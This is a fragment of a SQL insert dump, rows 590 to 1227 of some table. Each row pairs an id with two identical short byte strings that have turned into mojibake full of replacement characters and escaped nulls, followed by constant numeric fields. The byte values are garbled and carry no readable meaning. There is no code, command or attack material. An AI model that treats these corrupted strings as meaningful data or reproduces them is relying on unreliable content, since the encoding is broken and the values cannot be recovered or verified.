(590,'&��\0�\0\0\0\0�P\0','&��\0�\0\0\0\0�P\0',1,0,90,1),
(591,'\\5`t','\\5`t',1,0,90,0),
(592,'�G�','�G�',1,0,90,0),
(593,'-�\Z','-�\Z',1,0,90,0),
(594,'g���','g���',1,0,90,0),
(595,'��Ъ','��Ъ',1,0,90,0),
(596,'$\0�\0\0\0\0\0\0\0\0&�','$\0�\0\0\0\0\0\0\0\0&�',1,0,90,1),
(597,'E���','E���',1,0,90,0),
(598,'&��\0\0\0\0\0\\�t�','&��\0\0\0\0\0\\�t�',1,0,90,1),
(599,'&��\0\0�\0\0\0\0&`','&��\0\0�\0\0\0\0&`',1,0,90,1),
(600,'�_ ','�_ ',1,0,90,0),
(601,'Yt�t','Yt�t',1,0,90,0),
(602,'2?�T','2?�T',1,0,90,0),
(603,'h��;','h��;',1,0,90,0),
(604,'����','����',1,0,90,0),
(605,'g�H','g�H',1,0,90,0),
(606,'=�#','=�#',1,0,90,0),
(607,'�;�','�;�',1,0,90,0),
(608,' �\0\'\0\0\0\0\0\0bC',' �\0\'\0\0\0\0\0\0bC',1,0,90,1),
(609,'�A{�','�A{�',1,0,90,0),
(610,'��6�','��6�',1,0,90,0),
(611,'�;_�','�;_�',1,0,90,0),
(612,'�@��','�@��',1,0,90,0),
(613,'��/�','��/�',1,0,90,0),
(614,'[��','[��',1,0,90,0),
(615,'��P','��P',1,0,90,0),
(616,'�Z�{','�Z�{',1,0,90,0),
(617,'���','���',1,0,90,0),
(618,'+�$�','+�$�',1,0,90,0),
(619,'�ߠ','�ߠ',1,0,90,0),
(620,'O�)�','O�)�',1,0,90,0),
(621,'��d�','��d�',1,0,90,0),
(622,'��0','��0',1,0,90,0),
(623,'�1 ','�1 ',1,0,90,0),
(624,'\\3��','\\3��',1,0,90,0),
(625,'.���','.���',1,0,90,0),
(626,'L[','L[',1,0,90,0),
(627,' 3L',' 3L',1,0,90,0),
(628,'_�_x','_�_x',1,0,90,0),
(629,'QX4�','QX4�',1,0,90,0),
(630,'D��k','D��k',1,0,90,0),
(631,'2t*�','2t*�',1,0,90,0),
(632,'�~M5','�~M5',1,0,90,0),
(633,'%��-','%��-',1,0,90,0),
(634,'�d�','�d�',1,0,90,0),
(635,'g�g*','g�g*',1,0,90,0),
(636,'[���','[���',1,0,90,0),
(637,'/�>','/�>',1,0,90,0),
(638,'AlL`','AlL`',1,0,90,0),
(639,'\\��O','\\��O',1,0,90,0),
(640,'w;`<','w;`<',1,0,90,0),
(641,'���c','���c',1,0,90,0),
(642,'R��|','R��|',1,0,90,0),
(643,'gnW�','gnW�',1,0,90,0),
(644,'[���','[���',1,0,90,0),
(645,'��','��',1,0,90,0),
(646,'Z��','Z��',1,0,90,0),
(647,'3���','3���',1,0,90,0),
(648,'�PX�','�PX�',1,0,90,0),
(649,'��P','��P',1,0,90,0),
(650,'JаX','JаX',1,0,90,0),
(651,'�w','�w',1,0,90,0),
(652,'+�>;','+�>;',1,0,90,0),
(653,'-|T{','-|T{',1,0,90,0),
(654,'&��\0\0\0\0\0\0��','&��\0\0\0\0\0\0��',1,0,90,1),
(655,'��f','��f',1,0,90,0),
(656,'B��','B��',1,0,90,0),
(657,'��d�','��d�',1,0,90,0),
(658,'�aC�','�aC�',1,0,90,0),
(659,'6���','6���',1,0,90,0),
(660,' A� \0\0\0B�,(',' A� \0\0\0B�,(',1,0,90,1),
(661,'�t','�t',1,0,90,0),
(662,'�v#','�v#',1,0,90,0),
(663,' @\0\0\0\0\0\0\0\0\0C',' @\0\0\0\0\0\0\0\0\0C',1,0,90,1),
(664,'���','���',1,0,90,0),
(665,'��d�','��d�',1,0,90,0),
(666,'�z;�','�z;�',1,0,90,0),
(667,'4��2','4��2',1,0,90,0),
(668,'z�|\n','z�|\n',1,0,90,0),
(669,'��ù','��ù',1,0,90,0),
(670,'l��','l��',1,0,90,0),
(671,'�b�','�b�',1,0,90,0),
(672,'g䪿','g䪿',1,0,90,0),
(673,'3D�','3D�',1,0,90,0),
(674,'3D�d','3D�d',1,0,90,0),
(675,'��5H','��5H',1,0,90,0),
(676,'f�$�','f�$�',1,0,90,0),
(677,'�?;�','�?;�',1,0,90,0),
(678,'*��\0\0�\0\0\0\0\r��','*��\0\0�\0\0\0\0\r��',1,0,90,1),
(679,'�6x','�6x',1,0,90,0),
(680,'���','���',1,0,90,0),
(681,'6&O5','6&O5',1,0,90,0),
(682,'\"\\Qg','\"\\Qg',1,0,90,0),
(683,'�`�','�`�',1,0,90,0),
(684,'o�\\�','o�\\�',1,0,90,0),
(685,'Lݺ�','Lݺ�',1,0,90,0),
(686,'Xs�','Xs�',1,0,90,0),
(687,'�\\6','�\\6',1,0,90,0),
(688,'>j_�','>j_�',1,0,90,0),
(689,'-q�','-q�',1,0,90,0),
(690,'gJf','gJf',1,0,90,0),
(691,'��u','��u',1,0,90,0),
(692,'��p�','��p�',1,0,90,0),
(693,'�8^','�8^',1,0,90,0),
(694,'_��[','_��[',1,0,90,0),
(695,'/�$D','/�$D',1,0,90,0),
(696,'���','���',1,0,90,0),
(697,'Xchq','Xchq',1,0,90,0),
(698,'�6x','�6x',1,0,90,0),
(699,'Rf�','Rf�',1,0,90,0),
(700,'\\�5s','\\�5s',1,0,90,0),
(701,'Xc��','Xc��',1,0,90,0),
(702,'g���','g���',1,0,90,0),
(703,'�ж�','�ж�',1,0,90,0),
(704,'�`4','�`4',1,0,90,0),
(705,'�7�P','�7�P',1,0,90,0),
(706,'�]H','�]H',1,0,90,0),
(707,'&-H','&-H',1,0,90,0),
(708,'*� h1g\0\0\0\0\0\0\0','*� h1g\0\0\0\0\0\0\0',1,0,90,1),
(709,'� �|','� �|',1,0,90,0),
(710,'-��','-��',1,0,90,0),
(711,'\"Uc�','\"Uc�',1,0,90,0),
(712,'B�,7','B�,7',1,0,90,0),
(713,'g�y�','g�y�',1,0,90,0),
(714,'- j','- j',1,0,90,0),
(715,'�v�','�v�',1,0,90,0),
(716,'���','���',1,0,90,0),
(717,'��J�','��J�',1,0,90,0),
(718,'$\0�\0\0\0\0�<�����','$\0�\0\0\0\0�<�����',1,0,90,1),
(719,'�^d','�^d',1,0,90,0),
(720,'Q\0ۦ','Q\0ۦ',1,0,90,0),
(721,'�ũ�','�ũ�',1,0,90,0),
(722,'w��','w��',1,0,90,0),
(723,'l� �','l� �',1,0,90,0),
(724,'D���','D���',1,0,90,0),
(725,'u\r�','u\r�',1,0,90,0),
(726,'��:','��:',1,0,90,0),
(727,'*�\"&L\0\0\0\0\0\0\0','*�\"&L\0\0\0\0\0\0\0',1,0,90,1),
(728,'��q�','��q�',1,0,90,0),
(729,'�?G3','�?G3',1,0,90,0),
(730,'���','���',1,0,90,0),
(731,'v}P','v}P',1,0,90,0),
(732,'��}','��}',1,0,90,0),
(733,'�@��','�@��',1,0,90,0),
(734,'�橊','�橊',1,0,90,0),
(735,'��Z#','��Z#',1,0,90,0),
(736,'4��`','4��`',1,0,90,0),
(737,'���','���',1,0,90,0),
(738,'�Z�c','�Z�c',1,0,90,0),
(739,'��h','��h',1,0,90,0),
(740,'֮�','֮�',1,0,90,0),
(741,'��V ','��V ',1,0,90,0),
(742,'��b','��b',1,0,90,0),
(743,'Am��','Am��',1,0,90,0),
(744,'-^:�','-^:�',1,0,90,0),
(745,'\\��','\\��',1,0,90,0),
(746,'P��','P��',1,0,90,0),
(747,'-MJ�','-MJ�',1,0,90,0),
(748,'D���','D���',1,0,90,0),
(749,'����','����',1,0,90,0),
(750,'�\0�g','�\0�g',1,0,90,0),
(751,'(M?A','(M?A',1,0,90,0),
(752,'���$','���$',1,0,90,0),
(753,'M�=�','M�=�',1,0,90,0),
(754,'��U','��U',1,0,90,0),
(755,'M�6�','M�6�',1,0,90,0),
(756,' �D\0T\0��wӁ',' �D\0T\0��wӁ',1,0,90,1),
(757,' �p\"�T\0��=Ϥ',' �p\"�T\0��=Ϥ',1,0,90,1),
(758,'��̅','��̅',1,0,90,0),
(759,'tv1U','tv1U',1,0,90,0),
(760,'�ViQ','�ViQ',1,0,90,0),
(761,'�,��','�,��',1,0,90,0),
(762,'*� �\0\0\0\0\0\0\0','*� �\0\0\0\0\0\0\0',1,0,90,1),
(763,'�!6','�!6',1,0,90,0),
(764,'+�ϣ','+�ϣ',1,0,90,0),
(765,'��:�','��:�',1,0,90,0),
(766,'$��','$��',1,0,90,0),
(767,' A� \0\0\0B�,',' A� \0\0\0B�,',1,0,90,1),
(768,' A� \0\0\0B�,7',' A� \0\0\0B�,7',1,0,90,1),
(769,'T.��','T.��',1,0,90,0),
(770,'g��:','g��:',1,0,90,0),
(771,'$k�\0\0\0\0\0\0gsa','$k�\0\0\0\0\0\0gsa',1,0,90,1),
(772,'�>','�>',1,0,90,0),
(773,'�r.','�r.',1,0,90,0),
(774,'-[��','-[��',1,0,90,0),
(775,'L��y','L��y',1,0,90,0),
(776,'/]+-','/]+-',1,0,90,0),
(777,'��Q�','��Q�',1,0,90,0),
(778,'g|_','g|_',1,0,90,0),
(779,'�J��','�J��',1,0,90,0),
(780,'g]4','g]4',1,0,90,0),
(781,'B�%D','B�%D',1,0,90,0),
(782,'�B�','�B�',1,0,90,0),
(783,'*� c�(\0\0\0\0\0\0\0','*� c�(\0\0\0\0\0\0\0',1,0,90,1),
(784,'g��','g��',1,0,90,0),
(785,'g�?�','g�?�',1,0,90,0),
(786,'�X�T','�X�T',1,0,90,0),
(787,'��]�','��]�',1,0,90,0),
(788,'*\0ր\0 \0P\0\0\0\0\0\0Z�','*\0ր\0 \0P\0\0\0\0\0\0Z�',1,0,90,1),
(789,'B��','B��',1,0,90,0),
(790,'6�c�','6�c�',1,0,90,0),
(791,'Q�','Q�',1,0,90,0),
(792,'h�^','h�^',1,0,90,0),
(793,'��T','��T',1,0,90,0),
(794,'4���','4���',1,0,90,0),
(795,'#H�~','#H�~',1,0,90,0),
(796,'Ѷ�','Ѷ�',1,0,90,0),
(797,'- �X','- �X',1,0,90,0),
(798,'\'b��','\'b��',1,0,90,0),
(799,'+�9v','+�9v',1,0,90,0),
(800,'Xc�','Xc�',1,0,90,0),
(801,'���','���',1,0,90,0),
(802,'��v2','��v2',1,0,90,0),
(803,'�H�?','�H�?',1,0,90,0),
(804,'ϔO�','ϔO�',1,0,90,0),
(805,'�6}�','�6}�',1,0,90,0),
(806,'���@','���@',1,0,90,0),
(807,'ё6�','ё6�',1,0,90,0),
(808,'٠��','٠��',1,0,90,0),
(809,'Ɗ','Ɗ',1,0,90,0),
(810,'g���','g���',1,0,90,0),
(811,'��I','��I',1,0,90,0),
(812,'^�Y�','^�Y�',1,0,90,0),
(813,'u�','u�',1,0,90,0),
(814,'Z�','Z�',1,0,90,0),
(815,'g���','g���',1,0,90,0),
(816,'�]��','�]��',1,0,90,0),
(817,'���','���',1,0,90,0),
(818,'v}','v}',1,0,90,0),
(819,'AD�','AD�',1,0,90,0),
(820,'[���','[���',1,0,90,0),
(821,'RBu�','RBu�',1,0,90,0),
(822,'�R�H','�R�H',1,0,90,0),
(823,'����','����',1,0,90,0),
(824,'DF� ','DF� ',1,0,90,0),
(825,'�UQ�','�UQ�',1,0,90,0),
(826,'>)�','>)�',1,0,90,0),
(827,'�\"�<','�\"�<',1,0,90,0),
(828,'�D/u','�D/u',1,0,90,0),
(829,'B�,','B�,',1,0,90,0),
(830,'D��6','D��6',1,0,90,0),
(831,'�oI�','�oI�',1,0,90,0),
(832,'��f','��f',1,0,90,0),
(833,'QG)�','QG)�',1,0,90,0),
(834,'�\\.','�\\.',1,0,90,0),
(835,' @\0\0\0\0\0\0\0\0\0�',' @\0\0\0\0\0\0\0\0\0�',1,0,90,1),
(836,'��d�','��d�',1,0,90,0),
(837,'�]*B','�]*B',1,0,90,0),
(838,'*G�\0\r<\0\0\0\0\0\0\0','*G�\0\r<\0\0\0\0\0\0\0',1,0,90,1),
(839,'g���','g���',1,0,90,0),
(840,'m�&!','m�&!',1,0,90,0),
(841,'% \n+','% \n+',1,0,90,0),
(842,'�tB/','�tB/',1,0,90,0),
(843,' A�\0�W\0\0\0\0\0\0\0',' A�\0�W\0\0\0\0\0\0\0',1,0,90,1),
(844,'ϴ�r','ϴ�r',1,0,90,0),
(845,'ڣI','ڣI',1,0,90,0),
(846,'6$�q','6$�q',1,0,90,0),
(847,'g��','g��',1,0,90,0),
(848,'3��','3��',1,0,90,0),
(849,',�k�',',�k�',1,0,90,0),
(850,'��i�','��i�',1,0,90,0),
(851,'� ','� ',1,0,90,0),
(852,'Q�1','Q�1',1,0,90,0),
(853,'+�_�','+�_�',1,0,90,0),
(854,'$\0a�\0\0�\0\0\0\0\0>�','$\0a�\0\0�\0\0\0\0\0>�',1,0,90,1),
(855,'u��','u��',1,0,90,0),
(856,'�>\Z','�>\Z',1,0,90,0),
(857,'(\0�\0\0\0\\-O�wA�[','(\0�\0\0\0\\-O�wA�[',1,0,90,1),
(858,'>f��','>f��',1,0,90,0),
(859,'��l^','��l^',1,0,90,0),
(860,'��i','��i',1,0,90,0),
(861,'g]��','g]��',1,0,90,0),
(862,'3�','3�',1,0,90,0),
(863,'gHN�','gHN�',1,0,90,0),
(864,'h�Z�','h�Z�',1,0,90,0),
(865,'���','���',1,0,90,0),
(866,'*G�\0�F\0\0\0\0\0\0\0','*G�\0�F\0\0\0\0\0\0\0',1,0,90,1),
(867,'�j��','�j��',1,0,90,0),
(868,'h���','h���',1,0,90,0),
(869,'�]�','�]�',1,0,90,0),
(870,'�ߝ�','�ߝ�',1,0,90,0),
(871,'3�^$','3�^$',1,0,90,0),
(872,'����','����',1,0,90,0),
(873,'*G�\0\r/a\0\0\0\0\0\0\0','*G�\0\r/a\0\0\0\0\0\0\0',1,0,90,1),
(874,'��','��',1,0,90,0),
(875,'[y�Q','[y�Q',1,0,90,0),
(876,'»��','»��',1,0,90,0),
(877,'+��.','+��.',1,0,90,0),
(878,'Y��M','Y��M',1,0,90,0),
(879,'�O�','�O�',1,0,90,0),
(880,'�w �','�w �',1,0,90,0),
(881,'6\'','6\'',1,0,90,0),
(882,'M�8o','M�8o',1,0,90,0),
(883,'��d�','��d�',1,0,90,0),
(884,'tv2U','tv2U',1,0,90,0),
(885,'��H�','��H�',1,0,90,0),
(886,'U��7','U��7',1,0,90,0),
(887,'�Z�','�Z�',1,0,90,0),
(888,'��\"�','��\"�',1,0,90,0),
(889,'*G�\0\0\0\0\0\0\0�,','*G�\0\0\0\0\0\0\0�,',1,0,90,1),
(890,'ɖ-','ɖ-',1,0,90,0),
(891,'�2�U','�2�U',1,0,90,0),
(892,'3���','3���',1,0,90,0),
(893,'�_�','�_�',1,0,90,0),
(894,'R�0','R�0',1,0,90,0),
(895,'�kqc','�kqc',1,0,90,0),
(896,'\\5`e','\\5`e',1,0,90,0),
(897,'-�\r','-�\r',1,0,90,0),
(898,'*�b\0\0\0\0\0\0\0','*�b\0\0\0\0\0\0\0',1,0,90,1),
(899,'��9 ','��9 ',1,0,90,0),
(900,'��(','��(',1,0,90,0),
(901,'Uِ�','Uِ�',1,0,90,0),
(902,'���','���',1,0,90,0),
(903,'�6r{','�6r{',1,0,90,0),
(904,'�5Z','�5Z',1,0,90,0),
(905,'���','���',1,0,90,0),
(906,'g���','g���',1,0,90,0),
(907,'/�T','/�T',1,0,90,0),
(908,'��d�','��d�',1,0,90,0),
(909,'g�3','g�3',1,0,90,0),
(910,'Y*ұ','Y*ұ',1,0,90,0),
(911,'��=�','��=�',1,0,90,0),
(912,'�a�<','�a�<',1,0,90,0),
(913,'&<�-','&<�-',1,0,90,0),
(914,'2?\Z�','2?\Z�',1,0,90,0),
(915,'��g','��g',1,0,90,0),
(916,'���','���',1,0,90,0),
(917,'yj7','yj7',1,0,90,0),
(918,'&��','&��',1,0,90,0),
(919,'/e��','/e��',1,0,90,0),
(920,'���d','���d',1,0,90,0),
(921,'��/','��/',1,0,90,0),
(922,'���','���',1,0,90,0),
(923,'-�\Z\Z','-�\Z\Z',1,0,90,0),
(924,'��b','��b',1,0,90,0),
(925,'��d�','��d�',1,0,90,0),
(926,'�j#�','�j#�',1,0,90,0),
(927,'3M�;','3M�;',1,0,90,0),
(928,'�;X','�;X',1,0,90,0),
(929,'N�M�','N�M�',1,0,90,0),
(930,',� L',',� L',1,0,90,0),
(931,'��d�','��d�',1,0,90,0),
(932,'����','����',1,0,90,0),
(933,'\"Q','\"Q',1,0,90,0),
(934,'*�q&T\0\0\0\0\0\0\0','*�q&T\0\0\0\0\0\0\0',1,0,90,1),
(935,'&S\0\0`�o\0\0\0\0\0\0\0','&S\0\0`�o\0\0\0\0\0\0\0',1,0,90,1),
(936,'h�z�','h�z�',1,0,90,0),
(937,'4�\Z','4�\Z',1,0,90,0),
(938,'��d�','��d�',1,0,90,0),
(939,'MDg?','MDg?',1,0,90,0),
(940,'%0T�','%0T�',1,0,90,0),
(941,'+�Ʊ','+�Ʊ',1,0,90,0),
(942,'��X','��X',1,0,90,0),
(943,'��R�','��R�',1,0,90,0),
(944,'{�-J','{�-J',1,0,90,0),
(945,' @\0\0\0\0\0\0\0\0\0�',' @\0\0\0\0\0\0\0\0\0�',1,0,90,1),
(946,'�Z��','�Z��',1,0,90,0),
(947,'D��m','D��m',1,0,90,0),
(948,'��d�','��d�',1,0,90,0),
(949,'\\v�q','\\v�q',1,0,90,0),
(950,'X�0b','X�0b',1,0,90,0),
(951,'���','���',1,0,90,0),
(952,'e�Z','e�Z',1,0,90,0),
(953,'g���','g���',1,0,90,0),
(954,'h�Z�','h�Z�',1,0,90,0),
(955,'-�\Z ','-�\Z ',1,0,90,0),
(956,'�;�','�;�',1,0,90,0),
(957,'g$�','g$�',1,0,90,0),
(958,'��B','��B',1,0,90,0),
(959,'��\r5','��\r5',1,0,90,0),
(960,'H�8m','H�8m',1,0,90,0),
(961,'ν\Z','ν\Z',1,0,90,0),
(962,'��zr','��zr',1,0,90,0),
(963,'����','����',1,0,90,0),
(964,'��t�','��t�',1,0,90,0),
(965,'��d�','��d�',1,0,90,0),
(966,'g�\\ ','g�\\ ',1,0,90,0),
(967,'���','���',1,0,90,0),
(968,'4�','4�',1,0,90,0),
(969,'��)','��)',1,0,90,0),
(970,'�}�','�}�',1,0,90,0),
(971,'��','��',1,0,90,0),
(972,'��Y,','��Y,',1,0,90,0),
(973,'���\Z','���\Z',1,0,90,0),
(974,'E��3','E��3',1,0,90,0),
(975,'g�','g�',1,0,90,0),
(976,'��:','��:',1,0,90,0),
(977,'��i�','��i�',1,0,90,0),
(978,'#�~�','#�~�',1,0,90,0),
(979,'�H��','�H��',1,0,90,0),
(980,'�K��','�K��',1,0,90,0),
(981,'[֩E','[֩E',1,0,90,0),
(982,'�,�','�,�',1,0,90,0),
(983,'�a�z','�a�z',1,0,90,0),
(984,'3K�\"','3K�\"',1,0,90,0),
(985,'���','���',1,0,90,0),
(986,'�3�','�3�',1,0,90,0),
(987,'�i!�','�i!�',1,0,90,0),
(988,'��','��',1,0,90,0),
(989,'-�\Z','-�\Z',1,0,90,0),
(990,'��2','��2',1,0,90,0),
(991,'R��L','R��L',1,0,90,0),
(992,'*��x','*��x',1,0,90,0),
(993,'{�','{�',1,0,90,0),
(994,'��b�','��b�',1,0,90,0),
(995,'�(','�(',1,0,90,0),
(996,'&\0<\0\0\0\0�<���ٍn','&\0<\0\0\0\0�<���ٍn',1,0,90,1),
(997,'�U','�U',1,0,90,0),
(998,'J��P','J��P',1,0,90,0),
(999,'��','��',1,0,90,0),
(1000,'6&�','6&�',1,0,90,0),
(1001,'��|�','��|�',1,0,90,0),
(1002,'�A��','�A��',1,0,90,0),
(1003,'�7\\�','�7\\�',1,0,90,0),
(1004,'E1p?','E1p?',1,0,90,0),
(1005,'pv#�','pv#�',1,0,90,0),
(1006,'�J','�J',1,0,90,0),
(1007,'��','��',1,0,90,0),
(1008,'�?��','�?��',1,0,90,0),
(1009,'T&\0n','T&\0n',1,0,90,0),
(1010,'�be�','�be�',1,0,90,0),
(1011,'@*�;','@*�;',1,0,90,0),
(1012,'�0�4','�0�4',1,0,90,0),
(1013,'Rf�','Rf�',1,0,90,0),
(1014,'s|o�','s|o�',1,0,90,0),
(1015,'��','��',1,0,90,0),
(1016,'Vh!�','Vh!�',1,0,90,0),
(1017,'$�\0��(龿���{�','$�\0��(龿���{�',1,0,90,1),
(1018,'- �N','- �N',1,0,90,0),
(1019,'4�}','4�}',1,0,90,0),
(1020,'�ae','�ae',1,0,90,0),
(1021,'�Kݣ','�Kݣ',1,0,90,0),
(1022,'��','��',1,0,90,0),
(1023,'����','����',1,0,90,0),
(1024,'\\ͧ�','\\ͧ�',1,0,90,0),
(1025,'Y:&','Y:&',1,0,90,0),
(1026,'E1pI','E1pI',1,0,90,0),
(1027,'��^','��^',1,0,90,0),
(1028,'��j','��j',1,0,90,0),
(1029,'O��n','O��n',1,0,90,0),
(1030,'���','���',1,0,90,0),
(1031,'Y��','Y��',1,0,90,0),
(1032,'�Z\"�','�Z\"�',1,0,90,0),
(1033,'g��p','g��p',1,0,90,0),
(1034,'\\w�','\\w�',1,0,90,0),
(1035,'��p','��p',1,0,90,0),
(1036,'�Kݴ','�Kݴ',1,0,90,0),
(1037,'�v�','�v�',1,0,90,0),
(1038,'yY�','yY�',1,0,90,0),
(1039,'>f��','>f��',1,0,90,0),
(1040,'��','��',1,0,90,0),
(1041,'���','���',1,0,90,0),
(1042,'�F=�','�F=�',1,0,90,0),
(1043,'��','��',1,0,90,0),
(1044,'�k��','�k��',1,0,90,0),
(1045,'B^` ','B^` ',1,0,90,0),
(1046,'oDw�','oDw�',1,0,90,0),
(1047,'-�x�','-�x�',1,0,90,0),
(1048,'��1','��1',1,0,90,0),
(1049,'\\̋v','\\̋v',1,0,90,0),
(1050,'�w','�w',1,0,90,0),
(1051,'{9?','{9?',1,0,90,0),
(1052,'���E','���E',1,0,90,0),
(1053,'>�|','>�|',1,0,90,0),
(1054,'>��G','>��G',1,0,90,0),
(1055,'Wjƨ','Wjƨ',1,0,90,0),
(1056,'�{�V','�{�V',1,0,90,0),
(1057,']��5',']��5',1,0,90,0),
(1058,'��i�','��i�',1,0,90,0),
(1059,'gZ�j','gZ�j',1,0,90,0),
(1060,'�K�','�K�',1,0,90,0),
(1061,'O�L�','O�L�',1,0,90,0),
(1062,'t0e','t0e',1,0,90,0),
(1063,'�㕉','�㕉',1,0,90,0),
(1064,'-�\Z','-�\Z',1,0,90,0),
(1065,'�F_','�F_',1,0,90,0),
(1066,'T\'t�','T\'t�',1,0,90,0),
(1067,'����','����',1,0,90,0),
(1068,'��','��',1,0,90,0),
(1069,'%�B�','%�B�',1,0,90,0),
(1070,'g��K','g��K',1,0,90,0),
(1071,'@Z(d','@Z(d',1,0,90,0),
(1072,'�zg�','�zg�',1,0,90,0),
(1073,'�&(�','�&(�',1,0,90,0),
(1074,'Rf�','Rf�',1,0,90,0),
(1075,'>f��','>f��',1,0,90,0),
(1076,'oZ�$','oZ�$',1,0,90,0),
(1077,'�;�','�;�',1,0,90,0),
(1078,'�av�','�av�',1,0,90,0),
(1079,'�\0ٜ','�\0ٜ',1,0,90,0),
(1080,'�K�','�K�',1,0,90,0),
(1081,'��i�','��i�',1,0,90,0),
(1082,'oZ��','oZ��',1,0,90,0),
(1083,'C��','C��',1,0,90,0),
(1084,'D���','D���',1,0,90,0),
(1085,' �\0(m>k�\"��uTT',' �\0(m>k�\"��uTT',1,0,90,1),
(1086,'�iR','�iR',1,0,90,0),
(1087,'��','��',1,0,90,0),
(1088,'x5-�','x5-�',1,0,90,0),
(1089,'�Z(','�Z(',1,0,90,0),
(1090,'��8$','��8$',1,0,90,0),
(1091,'�7vh','�7vh',1,0,90,0),
(1092,'R݈','R݈',1,0,90,0),
(1093,'C�<�','C�<�',1,0,90,0),
(1094,'g�ى','g�ى',1,0,90,0),
(1095,'Yu%)','Yu%)',1,0,90,0),
(1096,'P��o','P��o',1,0,90,0),
(1097,'��R@','��R@',1,0,90,0),
(1098,'�=�M','�=�M',1,0,90,0),
(1099,'�� ','�� ',1,0,90,0),
(1100,'C�v�','C�v�',1,0,90,0),
(1101,'�bf�','�bf�',1,0,90,0),
(1102,'�t�M','�t�M',1,0,90,0),
(1103,'ecZ�','ecZ�',1,0,90,0),
(1104,'�;��','�;��',1,0,90,0),
(1105,'Q��','Q��',1,0,90,0),
(1106,'�aV�','�aV�',1,0,90,0),
(1107,'.��','.��',1,0,90,0),
(1108,'gh{�','gh{�',1,0,90,0),
(1109,'g3g{','g3g{',1,0,90,0),
(1110,'��u','��u',1,0,90,0),
(1111,'3�Z','3�Z',1,0,90,0),
(1112,'�`L\Z','�`L\Z',1,0,90,0),
(1113,'oZ�','oZ�',1,0,90,0),
(1114,'{�','{�',1,0,90,0),
(1115,'h�Z�','h�Z�',1,0,90,0),
(1116,'���v','���v',1,0,90,0),
(1117,'B^p','B^p',1,0,90,0),
(1118,'D��5','D��5',1,0,90,0),
(1119,'k��3','k��3',1,0,90,0),
(1120,'�GE�','�GE�',1,0,90,0),
(1121,'�,��','�,��',1,0,90,0),
(1122,'g���','g���',1,0,90,0),
(1123,'�Ա','�Ա',1,0,90,0),
(1124,'-]d[','-]d[',1,0,90,0),
(1125,'�^','�^',1,0,90,0),
(1126,'�V�Z','�V�Z',1,0,90,0),
(1127,'tv3-','tv3-',1,0,90,0),
(1128,'���','���',1,0,90,0),
(1129,'�[q�','�[q�',1,0,90,0),
(1130,'n\'7','n\'7',1,0,90,0),
(1131,'댾','댾',1,0,90,0),
(1132,'��N�','��N�',1,0,90,0),
(1133,'q�H�','q�H�',1,0,90,0),
(1134,'E9��','E9��',1,0,90,0),
(1135,'U�5','U�5',1,0,90,0),
(1136,'�\'{','�\'{',1,0,90,0),
(1137,'�Ɉu','�Ɉu',1,0,90,0),
(1138,'>f��','>f��',1,0,90,0),
(1139,'>��}','>��}',1,0,90,0),
(1140,'POvH','POvH',1,0,90,0),
(1141,'����','����',1,0,90,0),
(1142,'�m','�m',1,0,90,0),
(1143,'��#','��#',1,0,90,0),
(1144,'E��x','E��x',1,0,90,0),
(1145,'g��:','g��:',1,0,90,0),
(1146,'}�a','}�a',1,0,90,0),
(1147,'�u�z','�u�z',1,0,90,0),
(1148,'CޓC','CޓC',1,0,90,0),
(1149,'g{��','g{��',1,0,90,0),
(1150,'_�6}','_�6}',1,0,90,0),
(1151,'3�F','3�F',1,0,90,0),
(1152,'��H�','��H�',1,0,90,0),
(1153,'£�C','£�C',1,0,90,0),
(1154,'R�eq','R�eq',1,0,90,0),
(1155,'3�5','3�5',1,0,90,0),
(1156,'���p','���p',1,0,90,0),
(1157,'gHO�','gHO�',1,0,90,0),
(1158,'ϴ�','ϴ�',1,0,90,0),
(1159,'�t�*','�t�*',1,0,90,0),
(1160,'Ba&�','Ba&�',1,0,90,0),
(1161,'b�?d','b�?d',1,0,90,0),
(1162,'3��','3��',1,0,90,0),
(1163,'�I`�','�I`�',1,0,90,0),
(1164,'Ո]�','Ո]�',1,0,90,0),
(1165,'��j','��j',1,0,90,0),
(1166,'��R�','��R�',1,0,90,0),
(1167,'�;MF','�;MF',1,0,90,0),
(1168,'.%��','.%��',1,0,90,0),
(1169,'BU��','BU��',1,0,90,0),
(1170,'����','����',1,0,90,0),
(1171,'��','��',1,0,90,0),
(1172,'J�X','J�X',1,0,90,0),
(1173,'�zx�','�zx�',1,0,90,0),
(1174,'g_w%','g_w%',1,0,90,0),
(1175,'�_','�_',1,0,90,0),
(1176,'��','��',1,0,90,0),
(1177,'z��','z��',1,0,90,0),
(1178,'��','��',1,0,90,0),
(1179,'-}�','-}�',1,0,90,0),
(1180,'O���','O���',1,0,90,0),
(1181,'���','���',1,0,90,0),
(1182,'{�b�','{�b�',1,0,90,0),
(1183,'��','��',1,0,90,0),
(1184,'T\'u9','T\'u9',1,0,90,0),
(1185,'���','���',1,0,90,0),
(1186,'\"��','\"��',1,0,90,0),
(1187,'h�ѕ','h�ѕ',1,0,90,0),
(1188,'m��','m��',1,0,90,0),
(1189,'6�Hh','6�Hh',1,0,90,0),
(1190,'�a��','�a��',1,0,90,0),
(1191,'g���','g���',1,0,90,0),
(1192,'@�','@�',1,0,90,0),
(1193,'3O\'','3O\'',1,0,90,0),
(1194,'��','��',1,0,90,0),
(1195,'�k��','�k��',1,0,90,0),
(1196,'-uP�','-uP�',1,0,90,0),
(1197,'���','���',1,0,90,0),
(1198,'�6~�','�6~�',1,0,90,0),
(1199,'@*�#','@*�#',1,0,90,0),
(1200,'�am�','�am�',1,0,90,0),
(1201,'�Wz(','�Wz(',1,0,90,0),
(1202,'gZ��','gZ��',1,0,90,0),
(1203,'#�ij','#�ij',1,0,90,0),
(1204,'-Y��','-Y��',1,0,90,0),
(1205,'-=1�','-=1�',1,0,90,0),
(1206,'+��-','+��-',1,0,90,0),
(1207,'�Y��','�Y��',1,0,90,0),
(1208,'3O�N','3O�N',1,0,90,0),
(1209,'��','��',1,0,90,0),
(1210,'�\\̈́','�\\̈́',1,0,90,0),
(1211,'%���','%���',1,0,90,0),
(1212,'�@�','�@�',1,0,90,0),
(1213,'�\0�~','�\0�~',1,0,90,0),
(1214,'��p','��p',1,0,90,0),
(1215,'�i�','�i�',1,0,90,0),
(1216,'�#','�#',1,0,90,0),
(1217,'�j k','�j k',1,0,90,0),
(1218,'�Z��','�Z��',1,0,90,0),
(1219,'R݁,','R݁,',1,0,90,0),
(1220,'�F=�','�F=�',1,0,90,0),
(1221,'��-�','��-�',1,0,90,0),
(1222,'��','��',1,0,90,0),
(1223,'�\\u�','�\\u�',1,0,90,0),
(1224,'O�E�','O�E�',1,0,90,0),
(1225,'��','��',1,0,90,0),
(1226,'�','�',1,0,90,0),
(1227,'\\�~','\\�~',1,0,90,0),
